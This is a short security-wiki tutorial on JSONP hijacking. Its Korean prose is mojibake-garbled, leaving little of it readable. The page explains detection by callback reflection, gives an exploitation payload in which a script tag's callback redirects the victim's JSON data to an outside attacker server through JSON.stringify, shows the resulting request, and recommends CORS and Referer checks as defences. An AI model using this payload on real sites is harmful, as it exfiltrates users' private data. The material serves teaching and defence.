JSONP Hijacking

JSONP Hijacking

in

๐Ÿ” Introduction

JSONP Hijacking์€ ๋ฏผ๊ฐ ์ •๋ณด๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ํŽ˜์ด์ง€๊ฐ€ JSONP๋ฅผ ์ง€์›ํ•˜๋Š” ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ ์‰ฝ๊ฒŒ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.

JSONP

JSONP๋Š” CORS ์ •์ฑ…์œผ๋กœ SOP์— ์˜ˆ์™ธ๋ฅผ ๋‘๊ณ  ํ†ต์‹ ํ•˜๊ธฐ ์–ด๋ ค์šด ์„œ๋น„์Šค์—์„œ ํƒํ•˜๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ Reseponse ๋ฐ์ดํ„ฐ ๋‚ด callback์œผ๋กœ ์‚ฌ์šฉํ•  ํ•จ์ˆ˜๋ฅผ ๋ฏธ๋ฆฌ ๋ช…์‹œํ•˜์—ฌ <script src=''> ๋กœ ๋ฐ์ดํ„ฐ๋ฅผ ์ฝ์„ ์ˆ˜ ์žˆ๋„๋ก ์ง€์›ํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Request

GET /user/info?callback=func1 HTTP/1.1

Response

func1({"data":"this_is_user_info_data"})

๐Ÿ—ก Offensive techniques

Detect

jsonp๋ฅผ ๋ช…์‹œ์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” ํŽ˜์ด์ง€๋Š” ๋ฐ”๋กœ ์‹๋ณ„์ด ๊ฐ€๋Šฅํ•˜๋ฉฐ, ์ผ๋ฐ˜ ํŽ˜์ด์ง€์—์„œ๋„ ์„œ๋น„์Šค ์ฝ”๋“œ๋‚˜ ์„ค์ •์— ๋”ฐ๋ผ์„œ callback, jsonp ๋“ฑ์˜ function์ด response์— ๋ฐ˜์˜๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

[ Request ]
GET /user/info?jsonp=check HTTP/1.1

[ Response ]
HTTP/1.1 200 OK

check{
	"data":"data"
}

์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ response ์ฝ”๋“œ๋ฅผ ์ œ์–ดํ•  ์ˆ˜ ์žˆ์–ด์„œ ๋ณธ์ธ์ด callback ๋ฐ›์„ ํ•จ์ˆ˜๋ฅผ ๋งŒ๋“ค๊ณ  ์ •๋ณด๋ฅผ ๋ฆฌํ„ด๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

[ Request ]
GET /user/info?jsonp=check= HTTP/1.1

[ Reponse ]
HTTP/1.1 200 OK

check={
	"data":"data"
}
// ๊ณต๊ฒฉ์ž์˜ callback ํŽ˜์ด์ง€
console.log(JSON.stringify(check))

Exploitation

๋ณดํ†ต JSONP ํŽ˜์ด์ง€๋Š” JSON ํฌ๋งท์˜ Reseponse๋ฅผ ์‚ฌ์šฉํ•˜๊ธฐ ๋•Œ๋ฌธ์— JSON.stringify() ํ•จ์ˆ˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ํƒˆ์ทจํ•˜๊ธฐ ์œ„ํ•œ ์•„์ฃผ ์ข‹์€ ํ•จ์ˆ˜๊ฐ€ ๋ฉ๋‹ˆ๋‹ค. JSON.stringify() ๋Š” JSON ๋ฐ์ดํ„ฐ๋ฅผ String์œผ๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ํ•จ์ˆ˜์ธ๋ฐ, ์ด๋ฅผ ์ด์šฉํ•ด์„œ Response์˜ JSON ๋ฐ์ดํ„ฐ ์ „๋ฌธ์„ ํŒŒ์‹ฑํ•˜์ง€ ์•Š๊ณ  ๋ฐ”๋กœ ์–ป์–ด์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<script src="target.domain.com/getData?callback=document.location.href='https://www.hahwul.com?'+JSON.stringify"></script>
document.location.href='https://www.hahwul.com?'+JSON.stringify({"name":"data~~"})

Attacker Server

GET /?{\"name\":\"data~~~~\"}
Host: www.hahwul.com

๐Ÿ›ก Defensive techniques

๊ธฐ๋ณธ์ ์œผ๋กœ JSONP ์ž์ฒด๊ฐ€ ์•ˆ์ „ํ•œ ๊ตฌ์กฐ๋Š” ์•„๋‹ˆ๋ผ์„œ ๊ฐ€๊ธ‰์  SOP๋ฅผ ์ค€์ˆ˜ํ•  ์ˆ˜ ์žˆ๋„๋ก CORS ์„ค์ •์„ ํ†ตํ•ด ํ†ต์‹ ํ•ด์•ผํ•ฉ๋‹ˆ๋‹ค. ๋‹ค๋งŒ ์„œ๋น„์Šค ํŠน์„ฑ ์ƒ JSONP๋ฅผ ์‚ฌ์šฉํ•ด์•ผํ•˜๋Š” ๊ฒฝ์šฐ ๊ฐ€๊ธ‰์  ์ค‘์š”ํ•œ ์ •๋ณด๋ฅผ ์ตœ๋Œ€ํ•œ ๋‹ค๋ฃจ์ง€ ์•Š๋Š” ๊ฒƒ์ด ์ข‹์œผ๋ฉฐ, Referer ํ—ค๋” ๋“ฑ์œผ๋กœ ์š”์ฒญ์ด ๋ฐœ์ƒํ•œ ๊ตฌ๊ฐ„์„ ๊ฒ€์ฆํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

(๋ฌผ๋ก  Referer ๊ฒ€์ฆํ• ๊บผ๋ฉด CORS๋กœ ๊ตฌํ˜„ํ•ด์„œ SOP๋ฅผ ์ค€์ˆ˜ํ•˜๋Š”๊ฒŒ ๋” ์ข‹์ฃ )

๐Ÿ“Œ References

  • https://www.hahwul.com/2019/07/28/json-hijacking-with-script-src/